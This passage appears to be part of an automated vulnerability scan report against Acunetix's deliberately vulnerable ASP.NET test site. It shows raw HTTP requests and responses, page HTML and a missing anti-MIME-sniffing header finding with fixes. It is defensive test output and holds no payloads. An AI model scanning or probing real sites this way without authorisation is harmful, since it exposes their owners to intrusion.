GxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q944e4UqgWJpySuZGYD9y7m9ZXo/Q==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        20. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 17888
          
          
          Response body (17888 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8=" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLEirm5BAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+L5/dFSm3qL6WSrtXoxMhBWz78mQ==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
